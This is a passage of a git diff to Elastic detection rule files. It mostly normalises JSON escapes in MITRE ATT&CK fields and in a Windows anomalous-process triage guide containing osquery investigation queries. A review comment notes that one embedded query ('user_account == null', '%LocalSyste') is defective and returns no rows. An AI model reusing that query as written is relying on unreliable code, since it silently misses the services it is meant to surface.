through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "references": [ "https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html" ], 
@@ -43,7 +43,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/6d8685a1-94fa-4ef7-83de-59302e7c4ca8_1.json b/packages/security_detection_engine/kibana/security_rule/6d8685a1-94fa-4ef7-83de-59302e7c4ca8_1.json
index 755ff9d586a..7f791245652 100644
--- a/packages/security_detection_engine/kibana/security_rule/6d8685a1-94fa-4ef7-83de-59302e7c4ca8_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/6d8685a1-94fa-4ef7-83de-59302e7c4ca8_1.json
@@ -73,7 +73,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/6d8685a1-94fa-4ef7-83de-59302e7c4ca8_2.json b/packages/security_detection_engine/kibana/security_rule/6d8685a1-94fa-4ef7-83de-59302e7c4ca8_2.json
index e54fad95f80..96403e19141 100644
--- a/packages/security_detection_engine/kibana/security_rule/6d8685a1-94fa-4ef7-83de-59302e7c4ca8_2.json
+++ b/packages/security_detection_engine/kibana/security_rule/6d8685a1-94fa-4ef7-83de-59302e7c4ca8_2.json
@@ -72,7 +72,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/6d8685a1-94fa-4ef7-83de-59302e7c4ca8_3.json b/packages/security_detection_engine/kibana/security_rule/6d8685a1-94fa-4ef7-83de-59302e7c4ca8_3.json
index 44891835c16..46f5467ae63 100644
--- a/packages/security_detection_engine/kibana/security_rule/6d8685a1-94fa-4ef7-83de-59302e7c4ca8_3.json
+++ b/packages/security_detection_engine/kibana/security_rule/6d8685a1-94fa-4ef7-83de-59302e7c4ca8_3.json
@@ -72,7 +72,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/6e1a2cc4-d260-11ed-8829-f661ea17fbcc_1.json b/packages/security_detection_engine/kibana/security_rule/6e1a2cc4-d260-11ed-8829-f661ea17fbcc_1.json
index b7a4a052b87..a0333d02ac9 100644
--- a/packages/security_detection_engine/kibana/security_rule/6e1a2cc4-d260-11ed-8829-f661ea17fbcc_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/6e1a2cc4-d260-11ed-8829-f661ea17fbcc_1.json
@@ -76,7 +76,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0011",
 "name": "Command and Control",
diff --git a/packages/security_detection_engine/kibana/security_rule/6e1a2cc4-d260-11ed-8829-f661ea17fbcc_2.json b/packages/security_detection_engine/kibana/security_rule/6e1a2cc4-d260-11ed-8829-f661ea17fbcc_2.json
index 8e22bb2baa2..fb5a80899f1 100644
--- a/packages/security_detection_engine/kibana/security_rule/6e1a2cc4-d260-11ed-8829-f661ea17fbcc_2.json
+++ b/packages/security_detection_engine/kibana/security_rule/6e1a2cc4-d260-11ed-8829-f661ea17fbcc_2.json
@@ -75,7 +75,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0011",
 "name": "Command and Control",
diff --git a/packages/security_detection_engine/kibana/security_rule/6e1a2cc4-d260-11ed-8829-f661ea17fbcc_3.json b/packages/security_detection_engine/kibana/security_rule/6e1a2cc4-d260-11ed-8829-f661ea17fbcc_3.json
index 228a5f898e0..05513d0cd18 100644
--- a/packages/security_detection_engine/kibana/security_rule/6e1a2cc4-d260-11ed-8829-f661ea17fbcc_3.json
+++ b/packages/security_detection_engine/kibana/security_rule/6e1a2cc4-d260-11ed-8829-f661ea17fbcc_3.json
@@ -77,7 +77,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0011",
 "name": "Command and Control",
diff --git a/packages/security_detection_engine/kibana/security_rule/6e1a2cc4-d260-11ed-8829-f661ea17fbcc_4.json b/packages/security_detection_engine/kibana/security_rule/6e1a2cc4-d260-11ed-8829-f661ea17fbcc_4.json
index 94ee40380d1..e96d1723276 100644
--- a/packages/security_detection_engine/kibana/security_rule/6e1a2cc4-d260-11ed-8829-f661ea17fbcc_4.json
+++ b/packages/security_detection_engine/kibana/security_rule/6e1a2cc4-d260-11ed-8829-f661ea17fbcc_4.json
@@ -78,7 +78,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0011",
 "name": "Command and Control",
diff --git a/packages/security_detection_engine/kibana/security_rule/6e40d56f-5c0e-4ac6-aece-bee96645b172_102.json b/packages/security_detection_engine/kibana/security_rule/6e40d56f-5c0e-4ac6-aece-bee96645b172_102.json
index c07963bc642..70206197a4f 100644
--- a/packages/security_detection_engine/kibana/security_rule/6e40d56f-5c0e-4ac6-aece-bee96645b172_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/6e40d56f-5c0e-4ac6-aece-bee96645b172_102.json
@@ -15,7 +15,7 @@ "v3_windows_anomalous_process_all_hosts" ], "name": "Anomalous Process For a Windows Population", - "note": "## Triage and analysis\n\n### Investigating Anomalous Process For a Windows Population\n\nSearching for abnormal Windows processes is a good methodology to find potentially malicious activity within a network. Understanding what is commonly run within an environment and developing baselines for legitimate activity can help uncover potential malware and suspicious behaviors.\n\nThis rule uses a machine learning job to detect a Windows process that is rare and unusual for all of the monitored Windows hosts in your environment.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - If the parent process is a legitimate system utility or service, this could be related to software updates or system management. If the parent process is something user-facing like an Office application, this process could be more suspicious.\n - Investigate the process metadata \u2014 such as the digital signature, directory, etc. \u2014 to obtain more context that can indicate whether the executable is associated with an expected software vendor or package.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Consider the user as identified by the `user.name` field. 
Is this program part of an expected workflow for the user who ran this program on this host?\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Validate if the activity has a consistent cadence (for example, if it runs monthly or quarterly), as it could be part of a monthly or quarterly business process.\n- Examine the arguments and working directory of the process. These may provide indications as to the source of the program or the nature of the tasks it is performing.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False Positive Analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. 
A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Related Rules\n\n- Unusual Process For a Windows Host - 6d448b96-c922-4adb-b51c-b767f1ea5b76\n- Unusual Windows Path Activity - 445a342e-03fb-42d0-8656-0367eb2dead5\n- Unusual Windows Process Calling the Metadata Service - abae61a8-c560-4dbd-acca-1e1438bff36b\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Anomalous Process For a Windows Population\n\nSearching for abnormal Windows processes is a good methodology to find potentially malicious activity within a network. 
Understanding what is commonly run within an environment and developing baselines for legitimate activity can help uncover potential malware and suspicious behaviors.\n\nThis rule uses a machine learning job to detect a Windows process that is rare and unusual for all of the monitored Windows hosts in your environment.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - If the parent process is a legitimate system utility or service, this could be related to software updates or system management. If the parent process is something user-facing like an Office application, this process could be more suspicious.\n - Investigate the process metadata \u2014 such as the digital signature, directory, etc. \u2014 to obtain more context that can indicate whether the executable is associated with an expected software vendor or package.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Consider the user as identified by the `user.name` field. Is this program part of an expected workflow for the user who ran this program on this host?\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Validate if the activity has a consistent cadence (for example, if it runs monthly or quarterly), as it could be part of a monthly or quarterly business process.\n- Examine the arguments and working directory of the process. 
These may provide indications as to the source of the program or the nature of the tasks it is performing.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False Positive Analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. 
A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Related Rules\n\n- Unusual Process For a Windows Host - 6d448b96-c922-4adb-b51c-b767f1ea5b76\n- Unusual Windows Path Activity - 445a342e-03fb-42d0-8656-0367eb2dead5\n- Unusual Windows Process Calling the Metadata Service - abae61a8-c560-4dbd-acca-1e1438bff36b\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "references": [ "https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html" ], 
@@ -34,7 +34,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
@@ -49,7 +49,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/6e40d56f-5c0e-4ac6-aece-bee96645b172_103.json b/packages/security_detection_engine/kibana/security_rule/6e40d56f-5c0e-4ac6-aece-bee96645b172_103.json
index ec3c8971c01..13fae9d6791 100644
--- a/packages/security_detection_engine/kibana/security_rule/6e40d56f-5c0e-4ac6-aece-bee96645b172_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/6e40d56f-5c0e-4ac6-aece-bee96645b172_103.json
@@ -15,7 +15,7 @@ "v3_windows_anomalous_process_all_hosts" ], "name": "Anomalous Process For a Windows Population", - "note": "## Triage and analysis\n\n### Investigating Anomalous Process For a Windows Population\n\nSearching for abnormal Windows processes is a good methodology to find potentially malicious activity within a network. Understanding what is commonly run within an environment and developing baselines for legitimate activity can help uncover potential malware and suspicious behaviors.\n\nThis rule uses a machine learning job to detect a Windows process that is rare and unusual for all of the monitored Windows hosts in your environment.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - If the parent process is a legitimate system utility or service, this could be related to software updates or system management. If the parent process is something user-facing like an Office application, this process could be more suspicious.\n - Investigate the process metadata \u2014 such as the digital signature, directory, etc. \u2014 to obtain more context that can indicate whether the executable is associated with an expected software vendor or package.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Consider the user as identified by the `user.name` field. 
Is this program part of an expected workflow for the user who ran this program on this host?\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Validate if the activity has a consistent cadence (for example, if it runs monthly or quarterly), as it could be part of a monthly or quarterly business process.\n- Examine the arguments and working directory of the process. These may provide indications as to the source of the program or the nature of the tasks it is performing.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSyste' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - 
!{osquery{\"label\":\"Retrieve Service Unisgned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False Positive Analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Related Rules\n\n- Unusual Process For a Windows Host - 6d448b96-c922-4adb-b51c-b767f1ea5b76\n- Unusual Windows Path Activity - 445a342e-03fb-42d0-8656-0367eb2dead5\n- Unusual Windows Process Calling the Metadata Service - abae61a8-c560-4dbd-acca-1e1438bff36b\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- 
Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Anomalous Process For a Windows Population\n\nSearching for abnormal Windows processes is a good methodology to find potentially malicious activity within a network. Understanding what is commonly run within an environment and developing baselines for legitimate activity can help uncover potential malware and suspicious behaviors.\n\nThis rule uses a machine learning job to detect a Windows process that is rare and unusual for all of the monitored Windows hosts in your environment.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - If the parent process is a legitimate system utility or service, this could be related to software updates or system management. 
If the parent process is something user-facing like an Office application, this process could be more suspicious.\n - Investigate the process metadata \u2014 such as the digital signature, directory, etc. \u2014 to obtain more context that can indicate whether the executable is associated with an expected software vendor or package.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Consider the user as identified by the `user.name` field. Is this program part of an expected workflow for the user who ran this program on this host?\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Validate if the activity has a consistent cadence (for example, if it runs monthly or quarterly), as it could be part of a monthly or quarterly business process.\n- Examine the arguments and working directory of the process. These may provide indications as to the source of the program or the nature of the tasks it is performing.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, 
display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSyste' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Retrieve Service Unisgned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False Positive Analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. 
A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Related Rules\n\n- Unusual Process For a Windows Host - 6d448b96-c922-4adb-b51c-b767f1ea5b76\n- Unusual Windows Path Activity - 445a342e-03fb-42d0-8656-0367eb2dead5\n- Unusual Windows Process Calling the Metadata Service - abae61a8-c560-4dbd-acca-1e1438bff36b\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "references": [ "https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html" ], 
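Review bot: The `Osquery - Retrieve Services Running on User Accounts` query embedded in the new `note` string ends its predicate with `user_account == null`, which under SQLite's three-valued logic (the engine osquery uses) makes `NOT (... OR user_account == null)` evaluate to NULL for every ordinary account, so the query as written should return no rows at all; it also filters on `'%LocalSyste'`, which looks like a truncated `LocalSystem` and would not exclude services running as that account. The intended predicate is presumably `NOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR user_account IS NULL)`. This hunk only replaces the `\u003e` escape with a literal `>`, so the defect is pre-existing, and since these rule files appear to be exported from upstream rule sources the fix likely belongs there; the label `Retrieve Service Unisgned Executables` carries a typo for the same reason. The same note text recurs in the `_104.json` section that follows, whose hunk runs past the end of this view.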
@@ -34,7 +34,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
@@ -49,7 +49,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/6e40d56f-5c0e-4ac6-aece-bee96645b172_104.json b/packages/security_detection_engine/kibana/security_rule/6e40d56f-5c0e-4ac6-aece-bee96645b172_104.json
index 73ccdbbcf00..17fbc3011cb 100644
--- a/packages/security_detection_engine/kibana/security_rule/6e40d56f-5c0e-4ac6-aece-bee96645b172_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/6e40d56f-5c0e-4ac6-aece-bee96645b172_104.json
@@ -15,7 +15,7 @@ "v3_windows_anomalous_process_all_hosts" ], "name": "Anomalous Process For a Windows Population", - "note": "## Triage and analysis\n\n### Investigating Anomalous Process For a Windows Population\n\nSearching for abnormal Windows processes is a good methodology to find potentially malicious activity within a network. Understanding what is commonly run within an environment and developing baselines for legitimate activity can help uncover potential malware and suspicious behaviors.\n\nThis rule uses a machine learning job to detect a Windows process that is rare and unusual for all of the monitored Windows hosts in your environment.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - If the parent process is a legitimate system utility or service, this could be related to software updates or system management. If the parent process is something user-facing like an Office application, this process could be more suspicious.\n - Investigate the process metadata \u2014 such as the digital signature, directory, etc. \u2014 to obtain more context that can indicate whether the executable is associated with an expected software vendor or package.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Consider the user as identified by the `user.name` field. 
Is this program part of an expected workflow for the user who ran this program on this host?\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Validate if the activity has a consistent cadence (for example, if it runs monthly or quarterly), as it could be part of a monthly or quarterly business process.\n- Examine the arguments and working directory of the process. These may provide indications as to the source of the program or the nature of the tasks it is performing.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSyste' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - 
!{osquery{\"label\":\"Retrieve Service Unisgned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False Positive Analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Related Rules\n\n- Unusual Process For a Windows Host - 6d448b96-c922-4adb-b51c-b767f1ea5b76\n- Unusual Windows Path Activity - 445a342e-03fb-42d0-8656-0367eb2dead5\n- Unusual Windows Process Calling the Metadata Service - abae61a8-c560-4dbd-acca-1e1438bff36b\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- 
Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Anomalous Process For a Windows Population\n\nSearching for abnormal Windows processes is a good methodology to find potentially malicious activity within a network. Understanding what is commonly run within an environment and developing baselines for legitimate activity can help uncover potential malware and suspicious behaviors.\n\nThis rule uses a machine learning job to detect a Windows process that is rare and unusual for all of the monitored Windows hosts in your environment.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid 